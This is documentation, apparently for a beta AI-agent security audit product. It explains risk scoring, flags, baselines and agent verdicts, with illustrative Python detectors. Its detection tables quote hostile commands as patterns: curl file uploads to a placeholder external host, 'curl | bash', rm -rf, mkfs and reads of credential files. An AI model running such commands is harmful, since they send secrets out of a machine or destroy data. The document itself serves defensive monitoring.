Security Audit is a beta feature. Detection coverage and UI are evolving — feedback is welcome.
Every audit event receives a risk score from 0 to 3. The score determines the event’s risk level — high, medium, or low — and feeds into the per-agent verdict. This page explains what triggers each level, what the risk flags mean, and how agent verdicts are assigned.

Risk levels

High

Score = 3. Confirmed damage or an active attack. Act immediately.

Medium

Score = 2. Confirmed exposure, no confirmed damage yet. Review soon.

Low

Score = 1. Behavioral anomaly or pattern worth noting. Review periodically.

High risk triggers

An event is scored high (3) when any of the following flags are set:

exfil_pattern: A shell command explicitly sent local file content to an external URL. The data has already left the machine. Patterns that trigger this flag:
  • curl -F file=@/path/to/file https://external.example.com
  • curl --data-binary @/path/to/file https://external.example.com
  • curl --upload-file /path/to/file https://external.example.com
  • cat /path/to/file | curl -X POST -d @- https://external.example.com
  • scp /local/file user@remote:/path
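As a rough illustration of how the upload patterns listed above could be recognized, here is a minimal Python sketch. The regular expressions and the `has_exfil_pattern` helper are assumptions made for this example and are not the rules Claw Lens actually ships. The sketch also does not verify that the destination is external.

```python
import re

# Hypothetical regexes approximating the documented upload patterns.
EXFIL_PATTERNS = [
    # curl -F file=@/path/to/file ...
    re.compile(r"\bcurl\b.*\s(?:-F|--form)\s+\S*=@\S+"),
    # curl --data-binary @/path/to/file ...  or  ... | curl -d @- ...
    re.compile(r"\bcurl\b.*\s(?:--data-binary|--data|-d)\s+@\S+"),
    # curl --upload-file /path/to/file ...
    re.compile(r"\bcurl\b.*\s(?:--upload-file|-T)\s+\S+"),
    # scp /local/file user@remote:/path
    re.compile(r"\bscp\b\s+.*\S+@\S+:\S*"),
]


def has_exfil_pattern(command: str) -> bool:
    """Return True if the shell command resembles a file upload."""
    return any(p.search(command) for p in EXFIL_PATTERNS)
```

A plain download such as `curl https://example.com/index.html` matches none of these expressions, so it would not set the flag in this sketch.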
critical_cmd: A destructive or system-altering shell command was executed. Commands in this category:

| Pattern | Risk |
| --- | --- |
| rm -rf | Recursive forced deletion |
| `curl/wget \| bash` or `curl/wget \| sh` | Remote code execution |
| chmod +s | Sets the SUID bit |
| chmod 777 | World-writable permissions |
| dd if=... of=/dev/... | Direct disk write |
| iptables -F | Flushes the firewall |
| mkfs | Formats a filesystem |
| echo ... > /etc/ | Writes to system configuration |
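The command categories above could be matched along the following lines. This is only a sketch: the regular expressions and the `critical_risks` function are hypothetical and are looser or stricter than the product's real rules in ways the documentation does not specify.

```python
import re

# Hypothetical regexes, one per documented category (risk label -> pattern).
CRITICAL_PATTERNS = {
    "Recursive forced deletion": re.compile(
        r"\brm\s+-(?=[a-zA-Z]*r)(?=[a-zA-Z]*f)[a-zA-Z]+"),
    "Remote code execution": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:bash|sh)\b"),
    "Sets the SUID bit": re.compile(r"\bchmod\s+[ugoa]*\+s\b"),
    "World-writable permissions": re.compile(r"\bchmod\s+(?:-R\s+)?0?777\b"),
    "Direct disk write": re.compile(r"\bdd\s+.*\bof=/dev/\S+"),
    "Flushes the firewall": re.compile(r"\biptables\s+(?:.*\s)?-F\b"),
    "Formats a filesystem": re.compile(r"\bmkfs(?:\.\w+)?\b"),
    "Writes to system configuration": re.compile(r"\becho\b.*>\s*/etc/"),
}


def critical_risks(command: str) -> list:
    """Return the risk labels whose pattern matches the command."""
    return [risk for risk, pattern in CRITICAL_PATTERNS.items()
            if pattern.search(command)]
```

An empty result means the command would not set critical_cmd under these assumed patterns.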
prompt_injection: An injection pattern was detected in agent input. All prompt injection findings are scored high regardless of other context. See Audit Rules for the full pattern list.

Confirmed credential exfiltration: A credential was found in agent output and the same session subsequently made an external network call. Claw Lens correlates these two events and flags the finding as a potential exfiltration path.
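The correlation behind the credential exfiltration finding can be pictured as a single pass over time-ordered events. The sketch below is illustrative only: the `Event` fields and the `sessions_with_possible_exfil` function are hypothetical names, and treating "subsequently" as "strictly later in the same session" is an assumption.

```python
from dataclasses import dataclass


@dataclass
class Event:
    # Hypothetical event shape, for illustration only.
    session_id: str
    timestamp: float
    credential_in_output: bool = False
    external_call: bool = False


def sessions_with_possible_exfil(events):
    """Return IDs of sessions where an external call followed a credential exposure."""
    exposed = set()   # sessions in which a credential has already appeared
    flagged = set()
    for ev in sorted(events, key=lambda e: e.timestamp):
        # Check the call first so that only a later event counts as "subsequent".
        if ev.external_call and ev.session_id in exposed:
            flagged.add(ev.session_id)
        if ev.credential_in_output:
            exposed.add(ev.session_id)
    return flagged
```

A session that makes an external call before any credential appears is not flagged by this sketch, because the order of the two events matters.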

Medium risk triggers

An event is scored medium (2) when any of the following flags are set:

sensitive_data: A credential, API key, token, password, or private key appeared in tool output. The secret was exposed in the agent’s context but has not been confirmed as sent externally. See Credential Inventory for the full list of detected patterns.

elevated_cmd: A high-privilege shell command was executed. Commands in this category:

| Pattern | Examples |
| --- | --- |
| sudo | Any sudo invocation |
| ssh / scp / rsync | Remote connections and transfers |
| curl / wget | Any outbound HTTP request in a shell |
| nc / netcat / ftp | Raw network connections |
| cat .env / cat passwd / cat shadow | Reading credential files via shell |
| chown root | Changing ownership to root |
new_domain: The agent contacted a domain that does not appear in its baseline history. Domains are tracked per agent; a domain moves from “new” to “known” once it appears in the agent’s 30-day baseline data.

sensitive_path_medium: The agent accessed a path matching a medium-severity sensitive path rule (e.g., **/id_rsa, **/.env, **/Library/Keychains/**). See Audit Rules for the full path rule table.

Low risk triggers

An event is scored low (1) when any of the following flags are set:

sensitive_path: The agent accessed a path matching a low-severity sensitive path rule (e.g., **/.ssh/**, **/*.env, **/*token*) without a credential being found in the output.

anomaly_hour: The agent was active at an hour outside its typical active hours as recorded in the baseline.

anomaly_volume: The session’s total tool call count exceeded three times the agent’s average tool calls per session.

anomaly_path: The agent accessed a filesystem directory it has not accessed in the baseline period.

Risk flags reference

All flags that can appear on an event:
| Flag | Level | Trigger |
| --- | --- | --- |
| exfil_pattern | High | Shell command uploads file content to external URL |
| critical_cmd | High | Destructive shell command (rm -rf, mkfs, etc.) |
| prompt_injection | High | Injection pattern detected in agent input |
| sensitive_data | Medium | Credential or secret found in tool output |
| elevated_cmd | Medium | Privileged command (sudo, ssh, curl, etc.) |
| new_domain | Medium | External call to a domain not in baseline |
| sensitive_path_medium | Medium | Access to a medium-severity sensitive path |
| sensitive_path | Low | Access to a low-severity sensitive path |
| anomaly_hour | Low | Activity outside typical hours |
| anomaly_volume | Low | Session tool call count > 3× baseline average |
| anomaly_path | Low | Access to a directory not in baseline |
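To make the relationship between flags and scores concrete, the sketch below maps each flag in the table to its level and takes the highest one. Using the maximum is an assumption drawn from the "any of the following flags" wording. The names `FLAG_SCORES`, `LEVEL_NAMES`, and `score_event` are hypothetical, and a score of 0 is assumed to mean that no flag is set. The credential exfiltration finding has no flag name in the table, so it is left out.

```python
# Flag -> score, taken from the reference table (High = 3, Medium = 2, Low = 1).
FLAG_SCORES = {
    "exfil_pattern": 3,
    "critical_cmd": 3,
    "prompt_injection": 3,
    "sensitive_data": 2,
    "elevated_cmd": 2,
    "new_domain": 2,
    "sensitive_path_medium": 2,
    "sensitive_path": 1,
    "anomaly_hour": 1,
    "anomaly_volume": 1,
    "anomaly_path": 1,
}

LEVEL_NAMES = {3: "high", 2: "medium", 1: "low"}


def score_event(flags) -> int:
    """Return the highest score among the event's flags, or 0 if none are set."""
    return max((FLAG_SCORES.get(flag, 0) for flag in flags), default=0)


def risk_level(flags):
    """Return "high", "medium", "low", or None when the score is 0."""
    return LEVEL_NAMES.get(score_event(flags))
```

Under these assumptions, an event carrying both sensitive_path and elevated_cmd scores 2 and is reported as medium.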

Anomaly detection and baselines

Low-risk anomaly flags are relative to each agent’s individual baseline. The baseline is built from the agent’s last 30 days of activity and captures:
  • typical_hours — the 12 most active hours of day
  • avg_tool_calls_per_session — the mean number of tool calls across all sessions
  • typical_paths — the 20 most-accessed filesystem directories
  • known_domains — all external domains the agent has contacted
When an event deviates from the baseline on any of these dimensions, the corresponding anomaly flag is set. Baselines are rebuilt automatically as new sessions come in, so a new domain or new path eventually becomes part of the baseline if the agent accesses it consistently.
Anomaly flags are only set when a baseline exists. A new agent with no history will not trigger anomaly flags until enough sessions have been recorded to build one.
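The baseline fields and anomaly checks described above can be sketched as follows. The `Session` shape and both function names are hypothetical, and the input is assumed to be already limited to the last 30 days. Checking anomaly_path against typical_paths is also an assumption, since the documentation does not say which set is consulted.

```python
from collections import Counter
from dataclasses import dataclass, field
from statistics import mean
from typing import List


@dataclass
class Session:
    # Hypothetical session record: one entry in `hours` per tool call.
    hours: List[int] = field(default_factory=list)        # hour of day, 0-23
    directories: List[str] = field(default_factory=list)
    domains: List[str] = field(default_factory=list)


def build_baseline(sessions):
    """Build a baseline dict, or return None when there is no history."""
    if not sessions:
        return None
    hour_counts = Counter(h for s in sessions for h in s.hours)
    dir_counts = Counter(d for s in sessions for d in s.directories)
    return {
        "typical_hours": {h for h, _ in hour_counts.most_common(12)},
        "avg_tool_calls_per_session": mean([len(s.hours) for s in sessions]),
        "typical_paths": {d for d, _ in dir_counts.most_common(20)},
        "known_domains": {d for s in sessions for d in s.domains},
    }


def anomaly_flags(baseline, hour, directory, session_tool_calls):
    """Return the anomaly flags for one event; empty when no baseline exists."""
    if baseline is None:
        return set()
    flags = set()
    if hour not in baseline["typical_hours"]:
        flags.add("anomaly_hour")
    if session_tool_calls > 3 * baseline["avg_tool_calls_per_session"]:
        flags.add("anomaly_volume")
    if directory not in baseline["typical_paths"]:
        flags.add("anomaly_path")
    return flags
```

Returning an empty set when the baseline is None mirrors the rule that a new agent with no history triggers no anomaly flags.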

Agent Risk Level

The Agent Security tab assigns each agent one of three verdicts based on its active (non-dismissed) findings:
| Verdict | Meaning |
| --- | --- |
| safe | No active findings |
| caution | Has medium or low severity active findings |
| unsafe | Has high severity findings, or any active prompt injection finding |
Agent risk levels are driven by the severity of the underlying findings, not by raw event counts. Dismissing a finding updates the risk level: if the last high-severity finding on an agent is dismissed, the verdict may drop from unsafe to caution or safe.
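The verdict rules can be expressed in a few lines. The following is a minimal sketch, assuming a hypothetical `Finding` record with `severity`, `kind`, and `dismissed` fields; it is not the product's actual data model.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    # Hypothetical finding shape, for illustration only.
    severity: str            # "high", "medium", or "low"
    kind: str = ""           # e.g. "prompt_injection"
    dismissed: bool = False


def agent_verdict(findings) -> str:
    """Return "safe", "caution", or "unsafe" based on active findings only."""
    active = [f for f in findings if not f.dismissed]
    if not active:
        return "safe"
    if any(f.severity == "high" or f.kind == "prompt_injection" for f in active):
        return "unsafe"
    return "caution"
```

Because dismissed findings are filtered out first, dismissing the only high-severity finding on an agent moves the result to caution if other findings remain, or to safe if none do.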